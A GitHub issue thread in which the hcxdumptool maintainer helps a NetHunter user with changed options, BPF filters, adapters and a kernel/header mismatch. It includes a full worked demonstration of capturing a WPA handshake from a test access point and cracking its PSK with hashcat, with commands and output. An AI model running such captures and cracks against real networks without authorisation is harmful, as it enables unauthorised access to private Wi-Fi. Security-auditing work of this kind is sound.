hcxdumptool new style

[axeldog]

Need help with hcxdumptool on nethunter. When running command "hcxdumptool -i wlan0 -w pmkid.pcapng" it runs and pumps in pmkid.pcapng but if i add any more to the command like --filterlist_ap=my filter.txt --filternode=3 or --enable_status=1 it throws "2 errors during run time" "failed to arm interface" .

[ZerBea]

This options (--filterlist_ap=my filter.txt --filternode=3 or --enable_status=1) have been removed since v6.3.0.
From now on, it is mandatory to add a Berkeley Packet Filter (BPF) that do the entire filtering.

More information is here:
#343
#330

as well as here:
$ hcxdumptool --help

and in changelog:
https://github.com/ZerBea/hcxdumptool/blob/master/changelog#L83

Closed,this report here, because this changes are wanted and announced.

[ZerBea]

Option "enable_status=1" has been replaced by "rds=1" and the slow waterfall display has been replaced by a fast split screen.
Options "filterlist_ap=my filter.txt and "filternode=3" have been replaced by "bpf=filter.bpfc".
How to build the Berkeley Packet Filter is explained in help.

[ZerBea]

A typical command line (scan all frequencies supported by the interface) is
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F

In case of filtering:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F --bpf=filter.bpf

In case if using a single channel, e.g. channel 1:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -c 1a

Scan only main channel 1, 6 and 11 on 2.4GHz band:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1

Or any other combination of the new options.
Please take a look at help to get an overview of all options and the legend of the new split screen.

[axeldog]

Quick follow up question. On nethunter and kalilinux pc, any command with a "--" before it throws "unrecognised option " example --disable_deauthentication or --do_rcascan

[ZerBea]

This option "--do_rcascan" has been replaced by "--rcascan=active".
If you don't change that, you'll get an ERROR:

$ sudo hcxdumptool -i wlp48s0f4u2u4 --do_rcascan
hcxdumptool: unrecognized option '--do_rcascan'
hcxdumptool 6.3.1-69-g532cc54 (C) 2023 by ZeroBeat
usage: hcxdumptool -h for help

Running the new style, everything should be fine:

$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active

Requesting physical interface capabilities. This may take some time.
Please be patient...

or to scan all frequencies:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active -F

Requesting physical interface capabilities. This may take some time.
Please be patient...

[axeldog]

Also attack.bpf is empty. Use command hcxdumptool -m wlan0
tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf writes an empty file.

[axeldog]

Has the man page not been updated yet

[ZerBea]

Command line is wrong.
Your command line:

$ sudo tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf
tcpdump: can't parse filter expression: syntax error

correct command line:

$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf

$ cat attack.bpf
16
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
2 0 0 0
7 0 0 0
80 0 0 0
84 0 0 12
21 5 0 4
64 0 0 18
21 0 3 1762152635
72 0 0 16
21 0 1 4428
6 0 0 262144
6 0 0 0

[ZerBea]

The default man page of hcxdumptool points to "--help":
https://github.com/ZerBea/hcxdumptool/blob/master/man/hcxdumptool.1
It doesn't need an update.

If your manpage is different it is not created by me.

[axeldog]

Sorry in the command line I do add "addr1"
Also "man hcxdumptool" brings a whole new list of comands

[ZerBea]

Not my manpage.

[ZerBea]

Arch Linux don't need a manpage (like Debian). So it is not installed by default and makefile doesn't have an entry to install this manpage.
https://github.com/ZerBea/hcxdumptool/blob/master/Makefile

Maybe you have an old manpage (if you have not uninstaqlled the old version before you have installed the new verion) or a manpage created by a package maintainer.

[axeldog]

Ahhh so confusing lol.
New error.
Tcpdump: eithernet address used in non-ether expression. After trying to make bpf file.

[axeldog]

Forget last. My mistake.

[ZerBea]

tcpdump will show this error if the interface is not in monitor mode and not up.

[ZerBea]

If the target AP is not on channel 1a, 6a or 11a, don't forget to set the operation channel of the AP by option "-c" or scan all frequencies by option "-F".
Default scan is 1a, 6a and 11a, only.

[axeldog]

I didn't insert wlan before addr3 just -I wlan0 addr3

[ZerBea]

Ok

[axeldog]

My chanel is 11 so "-c 11a " is for 2.4ghz

[ZerBea]

Please also notice that running this filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf

You'll get a warning (missing frames) by hcxpcapngtool when converting the dump file to hc22000 format because undirected proberequest frames are filtered out, too.

To avoid that, add a BROADCAST MAC to your filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf

Additional you can tell hcxdumptool to terminate if you got a PMKID or a handshake:

--exitoneapol=<type>           : exit on first EAPOL occurrence:
                                  bitmask:
                                   1 = PMKID
                                   2 = EAPOL M2
                                   4 = EAPOL M3

[axeldog]

Would this adaptor work Alfa Network AWUS036AC Long-Range Dual-Band chipset RTL8812AU both bands?
Is there a difference between addr1 and addr3?

[ZerBea]

The RTL8812AU driver is not part of the stock Linux kernel.
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/drivers/net/wireless/realtek?h=v6.5.8
and you need to install a third party driver.

Please read the adapter section of README.md (recommended and not recommended chipsets/drivers).

Please also read this:
morrownr/USB-WiFi#314

There is a difference between addr1, addr2, addr3 and add4:

addr1 = to 
addr2 = from
addr3 = BSSID
addr4 = wireless distribution systems

https://www.geeksforgeeks.org/ieee-802-11-mac-frame/
https://www.rfwireless-world.com/Articles/WLAN-MAC-layer-protocol.html

[axeldog]

Your a legend thanks so much for your help. Is there a dule band adaptor you would recomend. Currently using the tplink tl wn722n 2.4ghs.

[axeldog]

Is there any other solutions to single out a specific ap to attack this dosent seem to work like you said.

[ZerBea]

ALFA AWUS036ACM
ALFA AWSU036ACHM
Both drivers are well maintained and part of the Linux kernel.
Both support active monitor mode.

Give me a few minutes to run a test.

[ZerBea]

here we go:
TP-Link TL-W722N v1:

$ lsusb
ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n

build filter:

$ sudo hcxdumptool -m wlp48s0f4u2u4
$ sudo tcpdump -i wlp48s0f4u2u4 wlan addr3 08:96:d7:98:e1:9e -ddd > attack.bpf

For this test we do not need frames addressed to BROADCAST MAC and they are filtered out.

run attack against target test AP:

$ sudo hcxdumptool -i wlp48s0f4u2u4 --rds=1 -w tlwn722v1.pcapng -c 10a --bpf=attack.bpf

 CHA    LAST   R 1 3 P S    MAC-AP    ESSID (last EAPOL on top)  SCAN-FREQUENCY:   2457
-----------------------------------------------------------------------------------------
 [ 10] 18:55:06 + + +   + 0896d798e19e AP_7272


   LAST   E 2 MAC-AP-ROGUE   MAC-CLIENT   ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
 18:54:59     0896d798e19e 00e62d021987 AP_7272

282 packet(s) captured
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
31 EPB written to pcapng dumpfile

exit on sigterm
bye-bye

conver to hc22000 format:

$ hcxpcapngtool -o test.22000 tlwn722v1.pcapng
hcxpcapngtool 6.3.1-109-gac0db30 reading from tlwn722v1.pcapng...

summary capture file
--------------------
file name................................: tlwn722v1.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.5.8-arch1-1
application..............................: hcxdumptool 6.3.1-69-g532cc54
interface name...........................: wlp48s0f4u2u4
interface vendor.........................: f81a67
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 000da76303f4 (incremented on every new client)
MAC CLIENT...............................: c02250d406bb
REPLAYCOUNT..............................: 62460
ANONCE...................................: 4655d441f5e986d1c7102b72799bd537abc7a9c8dc150391bf988a2d0a8db87b
SNONCE...................................: 3c2c9d4853f5cfad58cde9c27e0aef9b0c80899f33e2664a21ea8a04c8df4464
timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59
duartion of the dump tool (seconds)......: 1
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 31
frames with correct FCS..................: 31
packets received on 2.4 GHz..............: 31
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10 
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
EAPOL messages (total)...................: 24
EAPOL RSN messages.......................: 24
EAPOLTIME gap (measured maximum msec)....: 52
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 4
EAPOL M1 messages (total)................: 18
EAPOL M2 messages (total)................: 2
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 4
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2457: 31	

Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.

session summary
---------------
processed pcapng files................: 1

hcxpcapngtool has detected the absence of frames addressed to BROADCAST MAC and told us that (missing frames).

Try to recover the PSK:

$ hashcat -m 22000 test.22000 -a 6 12345678
hashcat (v6.2.6-812-g8a206a9c0) starting
...
12e5828236c9a5a54795dde9b2b9d0f1:0896d798e19e:00e62d021987:AP_7272:12345678
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Tue Oct 24 19:01:45 2023 (0 secs)
Time.Estimated...: Tue Oct 24 19:01:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       73 H/s (0.42ms) @ Accel:32 Loops:256 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 42c Fan:  0% Util: 59% Core:2835MHz Mem:10802MHz Bus:16

Started: Tue Oct 24 19:01:44 2023
Stopped: Tue Oct 24 19:01:46 2023

For this test I configured a very simple PSK 12345678 which was successful recovered by hashcat.

Conclusion:
It took only 2 seconds to perform the attack:

timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59

The PSK has been successful recovered.

[ZerBea]

You will not be able to compile this outdated driver.

[axeldog]

Best give up then I guess. Is it safe assume that esfile explorer pic I sent is compatible drivers as my tilink driver is there and that worked out the box no problems?

[axeldog]

Tplink*

[ZerBea]

Installing out of tree driver isn't easy.
Better to use a device running a stock Linux kernel driver.
If have good reasons to mention that in README.md:

No support for a third party driver which is not part of the official Linux kernel (https://www.kernel.org/)
Report related issues to the site, from which you downloaded the driver

Running is third party drivers means that you will run into problems.

[axeldog]

Is their a file with the stock kernal drivers in nethunter?

[ZerBea]

Stock drivers means that the driver comes with the Linux kernel:
That is not the case on rtl8812au.
You have to go for a third party driver, e.g.:
$ git clone https://github.com/aircrack-ng/rtl8812au

[axeldog]

That's the same one iv been trying to install

[ZerBea]

First of all you have to fix your configuration problems:
Looks like kernel header api doesn't match to your kernel headers: 4.14 vs 6.5

An example:
I'm on

$ uname -r
6.5.9-arch2-1

So my api headers should be on 6.x:

linux-api-headers 6.4-1
linux-headers 6.5.9.arch2-1

[axeldog]

It matches.

[axeldog]

Is there a way to find what drivers came preinstalled with my nethunter kernel

[ZerBea]

$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/

Should give a list like this:

admtek  broadcom  intersil  mediatek   quantenna  rsi     ti
ath     cisco     legacy    microchip  ralink     silabs  virtual
atmel   intel     marvell   purelifi   realtek    st      zydas

and

$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/mediatek

Should show you the MediaTek drivers:
mt76 mt7601u

[axeldog]

Dosent work.

[ZerBea]

Can't work, because it is a Linux (only) example.
You have to search for the modules directory of you distribution.

BTW:
It looks like it is not a official KALI nethunter distribution.

[axeldog]

I used the nethunter installer for my phone makecsnd model so should be the official one

[ZerBea]

What is the output of uname -r

[axeldog]

[axeldog]

[ZerBea]

and what is the output of
apt list --installed | grep header

[axeldog]

[ZerBea]

Configuration error:
KALI rooling relase == 6.5
your kernel == 4.14

Headers and kernel do not match.

[axeldog]

So nothing can be done to change it except maybe use nethunter installer to make a new kernel and flash it.

[ZerBea]

I don't know how to fix this on KALI nethunter, because I don't know how this happened.
But I've seen this before:
#332 (comment)

[axeldog]

I think I know what's happend. When I rooted my phone and flashed nethunter I used david bombals video but the only thing I didn't exactly copy because I couldn't find was the android version David used. He used oos 11.0.9.1 and I used 11.0.5.1

[ZerBea]

That is possible.
Unfortunately this will cause hcxdumptool to fail, too. It is compiled using 6.x API but it is running on kernel 4.14.

[axeldog]

Hcxdumptool was working for the bpf filter mode but that's all I tested. Guess I'm gonna have to wipe and reinstall everything. Will let you know the results.

[ZerBea]

Kernel and API should match:

$ uname -r
6.5.9-arch2-1

$ hcxdumptool -v
hcxdumptool 6.3.1-72-gb680a88 (C) 2023 ZeroBeat
compiled by gcc 13.2.1
compiled with Linux API headers 6.4.0
compiled with glibc 2.38

kernel == 6.x and API header == 6.x

[axeldog]

Update. Reinstalled a android and rooted installed kali nethunter and installed a kernel from the nethunter project and still the cyberknight777 kernel wich I'm pretty sure came from the nethunter installer project.

[ZerBea]

It is mandatory to make sure that KALI Linux api header match to your kernel.
If not, you will not be able to compile the driver.

[axeldog]

It's exactly the same as before. Really need help from someone who maintains nethunter installer project. And need to find the best way to uninstall nethunter without having to factory reset my phone and start from the beginning every time.